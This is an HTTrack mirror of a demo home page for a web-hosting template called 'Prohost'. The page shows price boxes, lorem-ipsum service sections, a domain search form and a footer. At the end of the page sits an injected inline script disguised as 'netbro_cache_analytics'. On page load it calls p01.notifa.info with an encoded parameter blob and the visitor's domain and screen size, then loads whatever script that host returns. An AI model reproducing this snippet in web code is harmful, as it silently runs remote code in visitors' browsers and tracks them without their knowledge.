<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:20 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Prohost - hosting provider responsive WHMCS, HTML5 and CSS3 premium template</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li class="active"><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Home Slider Section Start ========= -->

<div class="mainslider">
  <div id="bootstrap-touch-slider" class="carousel bs-slider fade  control-round indicators-line" >
    <div class="carousel-inner" role="listbox">
      <div class="item active"> <img src="images/banner.jpg" alt="Bootstrap Touch Slider"  class="slide-image"/>
        <div class="bs-slider-overlay"></div>
        <div class="container">
          <div class="row">
            <div class="slide-text slide_style_center">
              <h1 data-animation="animated zoomInRight">Shared Hosting</h1>
              <p data-animation="animated fadeInLeft">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Suspendisse et justo. Praesent mattis commodo augue. Aliquam ornare hendrerit augue</p>
              <a href="shared-hosting.html" class="primary_button" data-animation="animated fadeInRight">Buy Now!</a> </div>
          </div>
        </div>
      </div>
      <div class="item"> <img src="images/banner-2.jpg" alt="Bootstrap Touch Slider"  class="slide-image"/>
        <div class="bs-slider-overlay"></div>
        <div class="slide-text slide_style_center">
          <h1 data-animation="animated flipInX">Dedicated Server</h1>
          <p data-animation="animated lightSpeedIn">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Suspendisse et justo. Praesent mattis commodo augue. Aliquam ornare hendrerit augue</p>
          <a href="dedicated-servers.html" class="primary_button" data-animation="animated fadeInDown">Buy Now!</a> </div>
      </div>
      <div class="item"> <img src="images/banner-3.jpg" alt="Bootstrap Touch Slider"  class="slide-image"/>
        <div class="bs-slider-overlay"></div>
        <div class="slide-text slide_style_center">
          <h1 data-animation="animated zoomInLeft">Reseller Hosting</h1>
          <p data-animation="animated fadeInRight">Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Suspendisse et justo. Praesent mattis commodo augue. Aliquam ornare hendrerit augue</p>
          <a href="reseller-hosting.html" class="primary_button" data-animation="animated fadeInRight">Buy Now!</a> </div>
      </div>
    </div>
    <a class="left carousel-control" href="#bootstrap-touch-slider" role="button" data-slide="prev"> <span class="fa fa-angle-left" aria-hidden="true"></span> <span class="sr-only">Previous</span> </a> <a class="right carousel-control" href="#bootstrap-touch-slider" role="button" data-slide="next"> <span class="fa fa-angle-right" aria-hidden="true"></span> <span class="sr-only">Next</span> </a> </div>
</div>

<!-- ========= Home Slider Section End ========= -->
<section class="domain_promo text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Best Offers</h6>
          <h3>Our Domain Prices</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="col-md-2 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".6s">
        <div class="promo_box com">
          <div class="promo_h">.com</div>
          <div class="price_p">$1.59</div>
          <div class="price_c">$2.39</div>
        </div>
      </div>
      <div class="col-md-2 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".5s">
        <div class="promo_box in">
          <div class="promo_h">.in</div>
          <div class="price_p">$0.32</div>
          <div class="price_c">$1.50</div>
        </div>
      </div>
      <div class="col-md-2 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".4s">
        <div class="promo_box org">
          <div class="promo_h">.org</div>
          <div class="price_p">$2.07</div>
          <div class="price_c">$2.80</div>
        </div>
      </div>
      <div class="col-md-2 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
        <div class="promo_box biz">
          <div class="promo_h">.biz</div>
          <div class="price_p">$1.65</div>
          <div class="price_c">$2.16</div>
        </div>
      </div>
      <div class="col-md-2 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".4s">
        <div class="promo_box com">
          <div class="promo_h">.com</div>
          <div class="price_p">$1.59</div>
          <div class="price_c">$2.39</div>
        </div>
      </div>
      <div class="col-md-2 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="promo_box org">
          <div class="promo_h">.org</div>
          <div class="price_p">$2.07</div>
          <div class="price_c">$2.80</div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Home Search Bar Section Start ========= -->

<section class="home_search">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Domain Search</h6>
          <h3>perfect domain name</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="search_box">
          <form method="post" action="#">
            <input class="h_search" type="text" value="" placeholder="Enter Your Domain Name"  />
            <input class="primary_button h_submit" type="submit" value="Search">
            <input type="submit" name="transfer" class="secondry_button h_transfer" value="Transfer">
            <p class="white_text text_center">Please enter the characters you see in the image below into the text box provided. This is required to prevent automated submissions.</p>
            <div class="captcha text_center"><img src="images/verifyimage.png" alt="" title="" />
              <input type="text" name="code" maxlength="5" class="h_captcha text_center">
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Home Search Bar Section End ========= --> 

<!-- ========= Home Page Plan Section Start ========= -->

<section class="hosting_promo text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Best Offers</h6>
          <h3>Our Hosting Prices</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".4s">
        <div class="promo_box">
          <div class="sep"></div>
          <h5>Shared<span>Hosting</span></h5>
          <div class="price_p">$1.59/<span>year</span></div>
          <a class="primary_button" href="shared-hosting.html">know more</a> </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
        <div class="promo_box">
          <div class="sep"></div>
          <h5>Reseller<span>Hosting</span></h5>
          <div class="price_p">$0.32/<span>year</span></div>
          <a class="primary_button" href="reseller-hosting.html">know more</a> </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="promo_box">
          <div class="sep"></div>
          <h5>Dedicated<span>Server</span></h5>
          <div class="price_p">$2.07/<span>year</span></div>
          <a class="primary_button" href="dedicated-servers.html">know more</a> </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="promo_box">
          <div class="sep"></div>
          <h5>VPS<span>Server</span></h5>
          <div class="price_p">$1.65/<span>year</span></div>
          <a class="primary_button" href="vps.html">know more</a> </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Home Page Plan Section End ========= --> 

<!-- ========= What We Do Section Start ========= -->

<section class="what_we_do text_center white_text">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>include all</h6>
          <h3>What We Do</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s"><i class="fa fa-comments what-icon"></i>
        <h5 class="section_sub_heading">24/7 Support</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".2s"><i class="fa fa-code what-icon"></i>
        <h5 class="section_sub_heading">Included Apps</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInRight" data-wow-duration=".3" data-wow-delay=".3s"><i class="fa fa-clock-o what-icon"></i>
        <h5 class="section_sub_heading">Total security</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
      <div class="col-md-3 col-sm-6 col-xs-12 whatwedo wow fadeInRight" data-wow-duration=".3" data-wow-delay=".4s"><i class="fa fa-tachometer what-icon"></i>
        <h5 class="section_sub_heading">100% uptime</h5>
        <p>Lorem Ipsum is simply dummy text of theprinting and typesetting it has the randomised.</p>
      </div>
    </div>
  </div>
</section>

<!-- ========= What We Do Section End ========= --> 

<!-- ========= Why Register Section Start ========= -->

<section class="why_register text_center">
  <div class="container">
    <div class="col-md-12 col-sm-12 col-xs-12">
      <div class="headings black_text">
        <h6>Best Services</h6>
        <h3>Our Domain</h3>
        <div class="sep black_bg"></div>
      </div>
    </div>
    <div class="register_choose_section">
      <div class="row">
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
          <div class="choose_r_options"><i class="fa fa-server gradient_color"></i>
            <h5 class="section_sub_heading">Domain Transfers</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
          <div class="choose_r_options"><i class="fa fa-lock gradient_color"></i>
            <h5 class="section_sub_heading">Private Registration</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
        <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".5s">
          <div class="choose_r_options"><i class="fa fa-envelope gradient_color"></i>
            <h5 class="section_sub_heading">Free Email Account</h5>
            <p>There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form, by injected humour.</p>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Why Register Section End ========= --> 

<!-- ========= Home Services Section Start ========= -->

<section class="home_services white_text text_center">
  <div class="container">
    <div class="col-md-12 col-sm-12 col-xs-12">
      <div class="headings white_text">
        <h6>technology</h6>
        <h3>Available Services</h3>
        <div class="sep white_bg"></div>
      </div>
    </div>
    <div class="row">
      <div class="col-md-3 col-sm-6 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="plan_box">
          <div class="icon"><i class="fa fa-sitemap"></i></div>
          <h5 class="section_sub_heading">Data Protection</h5>
          <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="plan_box">
          <div class="icon"><i class="fa fa-tachometer"></i></div>
          <h5 class="section_sub_heading">Website Optimization</h5>
          <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="plan_box">
          <div class="icon"><i class="fa fa-credit-card"></i></div>
          <h5 class="section_sub_heading">Data Analysis</h5>
          <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
        </div>
      </div>
      <div class="col-md-3 col-sm-6 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".2s">
        <div class="plan_box">
          <div class="icon"><i class="fa fa-database"></i></div>
          <h5 class="section_sub_heading">Data Enctyption</h5>
          <p>Duis posuere blandit orci sed tincidunt. Curabitur porttitor nisi ac nunc ornare, in fringilla nisl blandit.</p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Home Services Section End ========= --> 

<!-- ========= Customers Testimonial Section Start ========= -->

<section class="customer_testimonial">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>customers</h6>
          <h3>testimonial</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="testimonial wow zoomIn" data-wow-duration=".3" data-wow-delay=".1s"><img src="images/testimonial.jpg" alt="" title="" />
          <div class="test_text_box">
            <p> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took galley of type and scrambled it to make a type specimen book. It has survived</p>
            <strong>Name Here</strong><span>Designation</span> </div>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Customers Testimonial Section End ========= --> 

<!-- ========= Home Blog Section Start ========= -->

<section class="home_blog">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Letest News</h6>
          <h3>From the Blog</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12">
        <div class="blog_txt_inner">
          <div class="blog_img wow zoomIn" data-wow-duration=".3" data-wow-delay=".1s"><a href="#"><img src="images/blog.jpg" alt="" title="" /></a></div>
          <h5 class="section_sub_heading"><a href="#"> Lorem ipsum dolor sit amet, consectetuer</a></h5>
          <span>April 15, 2017 | by: John Deo </span>
          <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
        </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12">
        <div class="blog_txt_inner">
          <div class="blog_img wow zoomIn" data-wow-duration=".3" data-wow-delay=".2s"><a href="#"><img src="images/blog-2.jpg" alt="" title="" /></a></div>
          <h5 class="section_sub_heading"><a href="#">consectetuer adipiscing elit, sed diam nonummy nibh </a></h5>
          <span>April 13, 2017 | by: John Deo </span>
          <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
        </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12">
        <div class="blog_txt_inner">
          <div class="blog_img wow zoomIn" data-wow-duration=".3" data-wow-delay=".3s"><a href="#"><img src="images/blog-3.jpg" alt="" title="" /></a></div>
          <h5 class="section_sub_heading"><a href="#">dolor sit amet consectetuer adipiscing elit</a></h5>
          <span>April 12, 2017 | by: John Deo </span>
          <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Home Blog Section End ========= --> 

<!-- ========= Call Back Form Section Start ========= -->

<section class="call_back_main text_center">
  <div class="container">
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="headings black_text">
        <h6>Contact Us</h6>
        <h3>Get a Call Back</h3>
        <div class="sep black_bg"></div>
      </div>
      <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
    </div>
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="form_outer">
        <form>
          <input type="text" name="name" class="name" placeholder="Name" required="">
          <input type="text" name="phone" class="name" placeholder="Contact Number" required="">
          <input type="email" name="email" class="name" placeholder="Email" required="">
          <input type="submit" name="submit" class="primary_button" value="Send Now">
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Call Back Form Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X4UeUhIt%2bWyGABuPFrsFMBlsLcnSlqQdS8z9DsXPQA0Kyc4c%2fIJt%2fP%2fWa0R7aIelAC4Es0xBnPzdaBB%2fKMMXGdFv11wt6k1ttf89Y6mKh51vsfywnYYpCq542ibaZ0N6BX91qRwS7qUzvr%2bfPwy05wttnN1n%2b3xNw%2b5H1Su0z3RH6K2j3bVrhiy2sdzaUe3XudGvh%2boEcaI%2fXxo%2bbaCwYOLSqxywm0k6k4j%2f5MvVqRxC0hssRTueGd7yRbSq2VuXMB5ZVLDo2rYN98r4%2fGsQh%2fwV6RwoqEemTTUfLXkna9v4LztAqQzRXkmWPCYNB%2fbqzk2WCZtKtlvEcB00kqaO80MRU0RxvWbihLLc%2bvgOqfZ4PeqSH%2bHFKKetDQYMTc2226STQ44JPjftiuhYuOkHLwIEZgn5SGRkEij2JIqiMI7kFf1%2bV%2bTwMBcVkVCfV2oFKCtQ%2fx9NngxSE01M81x%2fbmdMGPLK6W3S9c%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:20 GMT -->
</html>
